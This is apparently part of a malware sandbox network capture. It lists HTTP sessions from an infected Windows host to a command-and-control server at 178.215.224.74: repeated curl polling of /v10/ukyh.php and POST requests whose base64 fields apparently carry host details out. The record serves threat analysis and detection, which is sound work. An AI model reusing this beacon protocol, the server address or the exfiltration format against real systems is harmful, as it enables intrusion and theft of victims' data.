                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 30 6f 57 30 42 56 4d 7a 49 34 4b 6a 4d 79 4d 6a 4d 7a 4b 44 45 31 4d 43 59 77 4d 7a 55 73 4d 6a 49 30 4c 6a 63 30 57 55 68 66 4d 54 41 7a 4b 44 4d 77 4d 6a 49 31 4b 6c 4a 6e 64 6d 31 75 64 32 64 45 5a 58 52 70 59 57 64 78 4c 6d 64 36 5a 31 74 41 58 54 4d 34 4d 69 6f 78 4f 44 49 7a 4f 53 6f 7a 4e 54 6f 73 4d 44 4d 31 4c 44 6f 36 4e 69 77 33 4e 6c 74 41 58 54 49 71 4d 6a 49 39 4b 45 4d 36 58 46 64 78 5a 58 4a 78 58 47 46 73 5a 47 39 6d 63 31 35 44 63 48 42 47 59 58 5a 6a 58 6b 78 74 59 57 4e 73 58 48 52 6e 5a 58 4a 63 55 6d 31 30 5a 32 5a 31 5a 30 5a 6e 64 47 74 68 5a 58 45 6d 62 58 70 6e 57 30 4a 64 4f 43 6f 78 4d 44 4d 6f 53 7a 68 63 56 58 4e 6e 63 48 4e 63 59 32 78 6d 62 32 78 7a 56 45 46 79 63 6b 52 68 64 6d 46 65 54 6d 31 6a 59 32 35 65 64 47 56 74 63 6c 52 51 5a 58 5a 74 62 48 64 74 52 47 64 30 61 32 46 6e 63 53 35 6e 63 47 31 5a 51 [TRUNCATED]
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKD0oW0BVMzI4KjMyMjMzKDE1MCYwMzUsMjI0Ljc0WUhfMTAzKDMwMjI1KlJndm1ud2dEZXRpYWdxLmd6Z1tAXTM4MioxODIzOSozNTosMDM1LDo6Niw3NltAXTIqMjI9KEM6XFdxZXJxXGFsZG9mc15DcHBGYXZjXkxtYWNsXHRnZXJcUm10Z2Z1Z0ZndGthZXEmbXpnW0JdOCoxMDMoSzhcVXNncHNcY2xmb2xzVEFyckRhdmFeTm1jY25edGVtclRQZXZtbHdtRGd0a2FncS5ncG1ZQl0zMDAqNipbQlUzMDAqMzIwMTMqMTc6LjoxNywyMjYuNTZZQF8zMjAqMTI4MzMqOTdZSF0zMjIoMzIwMzkiMzU4LDIxNS4yMjYmNTRbQF8zMDMoMTAyMjIiUmd0ZW53ZUZndGlhZ3EuZXhnU0JdMTgyKDkwMjMzKDM1OCw6OTcsMjA0Ljc0W0Bf
                                      Nov 24, 2024 12:06:04.381767035 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:04 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      33192.168.2.549977178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:03.113019943 CET93OUTGET /v10/ukyh.php?gi HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:04.363940001 CET211INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:04 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 11
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                      Data Ascii: 8.46.123.75


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      34192.168.2.549979178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:05.154268026 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:06.410665989 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:06 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      35192.168.2.549985178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:06.076149940 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:07.327986956 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:07 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.549986178.215.224.74805544C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:06.920037985 CET728OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 434
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 39 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 59 57 78 6d 62 57 5a 78 57 30 42 56 54 56 45 6f 54 6d 4e 76 5a 7a 67 69 49 69 41 69 4b 43 67 69 49 69 41 69 49 43 41 67 49 43 41 67 49 69 67 69 54 57 6c 6a 63 47 31 7a 62 32 52 30 49 46 64 72 62 6d 78 76 64 58 45 67 4d 54 49 67 55 6e 42 74 57 30 4a 66 4d 7a 41 75 4d 44 4d 25 32 46 4d 6a 41 77 55 30 4a 66 4f 44 59 30 4e 44 63 30 57 55 4a 64 51 54 4a 55 56 33 46 6c 63 48 4e 63 59 57 78 6d 62 32 78 37 58 6b 46 77 63 45 5a 6a 64 47 46 65 54 47 39 6a 59 32 78 55 56 47 64 76 63 46 77 31 4e 6a 6f 79 4d 54 4a 65 52 47 74 75 61 58 4e 71 4a 6d 46 76 62 56 4e 43 58 30 73 36 58 6c 64 78 5a 33 42 78 58 47 4e 6b 62 6d 31 73 63 31 35 42 63 48 42 45 59 58 52 6a 56 45 35 76 59 32 46 75 58 6c 52 6c 62 33 42 63 4e 7a 51 34 4f 44 4d 77 58 6b 5a 70 62 47 6c 78 61 69 78 6a 62 57 39 5a 51 46 30 78 4d 69 55 77 4e 6c 74 49 58 30 46 4d 57 30 4a 66 64 6e 42 33 5a 31 74 43 56 57 35 6a [TRUNCATED]
                                      Data Ascii: jspo=9&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=YWxmbWZxW0BVTVEoTmNvZzgiIiAiKCgiIiAiICAgICAgIigiTWljcG1zb2R0IFdrbmxvdXEgMTIgUnBtW0JfMzAuMDM%2FMjAwU0JfODY0NDc0WUJdQTJUV3FlcHNcYWxmb2x7XkFwcEZjdGFeTG9jY2xUVGdvcFw1NjoyMTJeRGtuaXNqJmFvbVNCX0s6XldxZ3BxXGNkbm1sc15BcHBEYXRjVE5vY2FuXlRlb3BcNzQ4ODMwXkZpbGlxaixjbW9ZQF0xMiUwNltIX0FMW0JfdnB3Z1tCVW5jbnNnW0BdOC40NCYzMjMuNTdbQF9bQF1BOlRVcWdyc15hbmRtbnFeQ3BwRGN8Y1xSZ2NvYW5lXkZtbnJoa2ZMd29wcQ%3D%3D
                                      Nov 24, 2024 12:06:08.264122009 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:08 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      37192.168.2.549991178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:08.235279083 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:09.594404936 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:09 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      38192.168.2.549993178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:08.748045921 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:10.095940113 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:09 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      39192.168.2.549999178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:11.217077017 CET140OUTGET /v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:12.559952021 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:12 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      40192.168.2.550004178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:12.622910023 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:13.967916965 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:13 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      41192.168.2.550010178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:15.200854063 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:16.480266094 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:16 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      42192.168.2.550017178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:18.044914007 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:19.358442068 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:19 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      43192.168.2.550021178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:19.615078926 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:20.936778069 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:20 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      44192.168.2.550022178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:22.381680012 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:23.703572035 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:23 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      45192.168.2.550023178.215.224.25280
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:23.726880074 CET98OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.252
                                      User-Agent: curl/7.83.1
                                      Accept: */*


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      46192.168.2.550024178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:23.933331013 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:25.283814907 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:25 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      47192.168.2.550025178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:25.827071905 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:27.128097057 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:26 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      48192.168.2.550026178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:27.326965094 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:28.589703083 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:28 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      49192.168.2.550027178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:29.120925903 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:30.446918011 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:30 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      50192.168.2.550028178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:30.674067020 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:31.975743055 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:31 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      51192.168.2.550029178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:32.499207973 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:33.824197054 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:33 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      52192.168.2.550030178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:34.029565096 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:35.290307045 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:35 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      53192.168.2.550031178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:35.926666021 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:37.244282961 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:37 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      54192.168.2.550032178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:37.439237118 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:38.693674088 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:38 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      55192.168.2.550033178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:39.266722918 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:40.519756079 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:40 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      56192.168.2.550034178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:40.748153925 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:42.049232006 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:41 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      57192.168.2.550035178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:42.749125004 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:44.097110033 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:43 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      58192.168.2.550036178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:44.337913990 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:45.696007013 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:45 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      59192.168.2.550037178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:46.688987970 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:47.966897964 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:47 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      60192.168.2.550038178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:48.166101933 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:49.466747046 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:49 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      61192.168.2.550039178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:50.128731966 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:51.473069906 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:51 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      62192.168.2.550040178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:50.902283907 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:52.162559986 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:51 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      63192.168.2.550041178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:51.814507961 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:53.131591082 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:52 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      64192.168.2.550042178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:52.418018103 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:53.731255054 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:53 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      65192.168.2.550043178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:53.716804028 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
